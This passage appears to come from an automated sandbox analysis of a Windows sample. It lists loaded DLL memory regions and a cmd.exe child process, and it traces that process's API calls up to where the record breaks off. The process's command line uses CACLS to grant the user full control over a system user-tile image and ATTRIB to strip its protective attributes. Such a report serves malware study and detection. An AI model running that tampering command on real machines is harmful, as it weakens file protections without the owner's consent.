"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28099 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28100 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28101 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28102 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28103 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28104 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28105 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28106 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28107 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28108 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28109 start_va = 0x170000 end_va = 0x237fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 28110 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28111 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 614 os_tid = 0x134 Process: id = "429" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0x954" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28112 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28113 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28114 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28115 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 28116 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28117 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28118 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28119 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28120 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 28121 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28122 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28123 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28124 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28125 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 28126 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 28127 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28128 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28129 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28130 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28131 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28132 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28133 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28134 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28135 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28136 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 28137 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28138 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28139 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 28140 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 28141 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 28142 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 28143 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 28144 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 28145 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 28146 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 618 os_tid = 0xb08 [0191.579] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbfc | out: lpSystemTimeAsFileTime=0x18fbfc*(dwLowDateTime=0xa718c4c0, dwHighDateTime=0x1d440a9)) [0191.579] GetCurrentProcessId () returned 0x954 [0191.579] GetCurrentThreadId () returned 0xb08 [0191.579] GetTickCount () returned 0x36853 [0191.579] QueryPerformanceCounter (in: lpPerformanceCount=0x18fbf4 | out: lpPerformanceCount=0x18fbf4*=24836809614) returned 1 [0191.580] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0191.580] __set_app_type (_Type=0x1) [0191.580] __p__fmode () returned 0x76b331f4 [0191.580] __p__commode () returned 0x76b331fc [0191.580] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0191.580] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0191.580] GetCurrentThreadId () returned 0xb08 [0191.580] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb08) returned 0x38 [0191.580] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0191.580] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0191.581] SetThreadUILanguage (LangId=0x0) returned 0x409 [0191.581] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0191.581] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fb8c | out: phkResult=0x18fb8c*=0x0) returned 0x2 [0191.581] VirtualQuery (in: lpAddress=0x18fbc3, lpBuffer=0x18fb5c, dwLength=0x1c | out: lpBuffer=0x18fb5c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.581] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fb5c, dwLength=0x1c | out: lpBuffer=0x18fb5c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0191.581] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fb5c, dwLength=0x1c | out: lpBuffer=0x18fb5c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0191.581] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fb5c, dwLength=0x1c | out: lpBuffer=0x18fb5c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.581] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fb5c, dwLength=0x1c | out: lpBuffer=0x18fb5c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0191.581] GetConsoleOutputCP () returned 0x1b5 [0191.581] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.581] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0191.581] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.581] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0191.582] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.582] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0191.582] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.582] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0191.582] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.582] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0191.582] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.582] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0191.583] GetEnvironmentStringsW () returned 0x220308* [0191.583] FreeEnvironmentStringsW (penv=0x220308) returned 1 [0191.583] GetEnvironmentStringsW () returned 0x220308* [0191.583] FreeEnvironmentStringsW (penv=0x220308) returned 1 [0191.583] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eafc | out: phkResult=0x18eafc*=0x40) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x0, lpData=0x18eb08*=0xb8, lpcbData=0x18eb00*=0x1000) returned 0x2 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x1, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x0, lpData=0x18eb08*=0x1, lpcbData=0x18eb00*=0x1000) returned 0x2 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x0, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x40, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x40, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x0, lpData=0x18eb08*=0x40, lpcbData=0x18eb00*=0x1000) returned 0x2 [0191.583] RegCloseKey (hKey=0x40) returned 0x0 [0191.583] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eafc | out: phkResult=0x18eafc*=0x40) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x0, lpData=0x18eb08*=0x40, lpcbData=0x18eb00*=0x1000) returned 0x2 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x1, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x0, lpData=0x18eb08*=0x1, lpcbData=0x18eb00*=0x1000) returned 0x2 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x0, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x9, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.584] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x9, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.584] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x0, lpData=0x18eb08*=0x9, lpcbData=0x18eb00*=0x1000) returned 0x2 [0191.584] RegCloseKey (hKey=0x40) returned 0x0 [0191.584] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886399 [0191.584] srand (_Seed=0x5b886399) [0191.584] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"" [0191.584] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"" [0191.584] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0191.584] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x221a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0191.584] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.584] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.584] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0191.584] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0191.584] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0191.584] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0191.584] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0191.584] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0191.584] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0191.584] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0191.585] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0191.585] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0191.585] GetEnvironmentStringsW () returned 0x222458* [0191.585] FreeEnvironmentStringsW (penv=0x222458) returned 1 [0191.585] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.585] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0191.585] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0191.585] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0191.585] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0191.585] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0191.585] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0191.585] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0191.585] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0191.585] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0191.585] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f8c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0191.585] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f8c8, lpFilePart=0x18f8c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f8c4*="Desktop") returned 0x18 [0191.585] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0191.585] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f644 | out: lpFindFileData=0x18f644) returned 0x220ae8 [0191.585] FindClose (in: hFindFile=0x220ae8 | out: hFindFile=0x220ae8) returned 1 [0191.585] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f644 | out: lpFindFileData=0x18f644) returned 0x220ae8 [0191.586] FindClose (in: hFindFile=0x220ae8 | out: hFindFile=0x220ae8) returned 1 [0191.586] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f644 | out: lpFindFileData=0x18f644) returned 0x220ae8 [0191.586] FindClose (in: hFindFile=0x220ae8 | out: hFindFile=0x220ae8) returned 1 [0191.586] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0191.586] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0191.586] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0191.586] GetEnvironmentStringsW () returned 0x220308* [0191.586] FreeEnvironmentStringsW (penv=0x220308) returned 1 [0191.586] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0191.587] GetConsoleOutputCP () returned 0x1b5 [0191.587] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.587] GetUserDefaultLCID () returned 0x409 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fa08, cchData=128 | out: lpLCData="0") returned 2 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fa08, cchData=128 | out: lpLCData="0") returned 2 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fa08, cchData=128 | out: lpLCData="1") returned 2 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0191.587] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0191.588] GetConsoleTitleW (in: lpConsoleTitle=0x2109b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.588] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0191.588] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0191.588] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0191.589] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0191.589] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0191.590] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0191.590] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0191.590] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0191.590] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0191.590] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0191.590] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0191.590] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0191.592] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0191.592] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0191.592] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0191.592] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0191.592] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0191.592] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0191.625] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0191.627] GetConsoleTitleW (in: lpConsoleTitle=0x18f69c, nSize=0x104 | out: 